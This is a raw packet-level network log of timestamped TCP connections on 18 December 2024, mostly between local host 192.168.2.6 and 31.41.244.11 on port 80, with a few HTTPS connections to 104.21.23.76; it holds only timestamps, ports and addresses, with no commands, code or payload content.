                                                                                                                                                                  Dec 18, 2024 11:09:29.325449944 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.325504065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.325524092 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.325575113 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.326455116 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.326483011 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.326502085 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.326577902 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.327461004 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.327531099 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.327572107 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.327573061 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.328568935 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.328596115 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.328608990 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.328681946 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.329386950 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.329437017 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.329472065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.329523087 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.330501080 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.330528975 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.330549955 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.330629110 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.331353903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.331401110 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.331456900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.331513882 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.332382917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.332410097 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.332458019 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.332458019 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.333386898 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.333416939 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.333455086 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.333455086 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.334319115 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.334408045 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.334464073 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.334541082 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.335402012 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.335445881 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.335490942 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.335490942 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.336219072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.336316109 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.336349010 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.336431026 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.337327957 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.337374926 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.337505102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.337682009 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.338401079 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.338433981 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.338464975 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.338556051 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.339154959 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.339278936 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.339359045 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.339404106 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.340147018 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.340194941 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.340311050 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.340405941 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.341150045 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.341193914 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.341242075 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.341290951 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.342312098 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.342360973 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.342475891 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.342547894 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.343338966 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.343372107 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.343398094 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.343483925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.344120979 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.344346046 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.344404936 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.344446898 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.345086098 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.345136881 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.345201015 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.345431089 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.346000910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.346098900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.482955933 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.483022928 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.483051062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.483059883 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.483103037 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.483103037 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.483428955 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.483478069 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.484371901 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.484406948 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.484447002 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.484447002 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.484673023 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.485241890 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.485378027 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.485428095 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.486538887 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.486551046 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.486602068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.487382889 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.487395048 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.487430096 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.488606930 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.488619089 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.488629103 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.488676071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.488676071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.489537954 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.489586115 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.489597082 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.490736961 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.490746975 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.490757942 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.490776062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.490776062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.491331100 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.492516994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.492527962 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.492539883 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.492582083 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.492582083 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.493541956 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.493551970 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.493562937 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.493613005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.493613005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.495371103 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.495417118 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.499448061 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.499479055 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.499504089 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.499589920 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.499711037 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.499747992 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.499758005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.499808073 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.501101971 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.501147985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.501154900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.501283884 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.502109051 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.502142906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.502182961 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.502182961 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.502638102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.502722979 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.502767086 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.502767086 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.503582954 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.503628969 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.503700972 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.504616022 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.504702091 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.504735947 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.504772902 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.504772902 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.505634069 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.505669117 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.505687952 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.506501913 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.506515980 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.506577969 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.506629944 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.506709099 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.507544041 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.507653952 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.508644104 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.508677959 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.508713007 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.508718014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.508718014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.509344101 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.509407997 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.509547949 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.509581089 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.509779930 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.510418892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.510489941 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.510546923 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.510608912 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.512150049 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.512185097 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.512221098 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.512221098 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.512386084 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.512485027 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.512552977 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.512707949 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.513541937 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.513552904 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.513590097 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.514373064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.514413118 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.514446974 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.514446974 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.515372992 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.515419006 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.515731096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.515784025 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.516315937 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.516364098 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.516443968 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.516617060 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.517384052 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.517396927 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.517426014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.518198013 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.518240929 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.518991947 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.519036055 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.519368887 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.519381046 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.519475937 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.520499945 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.520512104 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.520729065 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.522290945 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.522301912 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.522313118 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.522335052 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.522488117 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.522521973 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.523335934 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.523364067 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.523375988 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.523802042 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.524257898 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.524271011 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.524614096 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.525360107 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.525372982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.525507927 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.526055098 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.526101112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.526405096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.526453018 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.527380943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.527391911 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.527426004 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.528620958 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.528637886 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.528671980 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.529669046 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.529685020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.529733896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.529733896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.530733109 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.530745029 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.530780077 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.531378031 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.531388998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.531420946 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.532882929 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.532893896 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.532922029 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.532958031 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.532958031 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.533947945 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.533967972 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.533997059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.534008980 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.534008980 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.534508944 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.535011053 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.535022020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.535056114 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.536072016 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.536084890 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.536154032 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.537126064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.537137985 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.537265062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.538182020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.538223982 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.578118086 CET44349913104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.578216076 CET44349913104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.578288078 CET49913443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:29.578511953 CET49913443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:29.578527927 CET44349913104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.590945005 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:29.590976000 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.591043949 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:29.591309071 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:29.591324091 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.675930977 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.675950050 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.675961971 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.675973892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.675986052 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.676016092 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.676057100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.676071882 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.676096916 CET4991280192.168.2.631.41.244.11
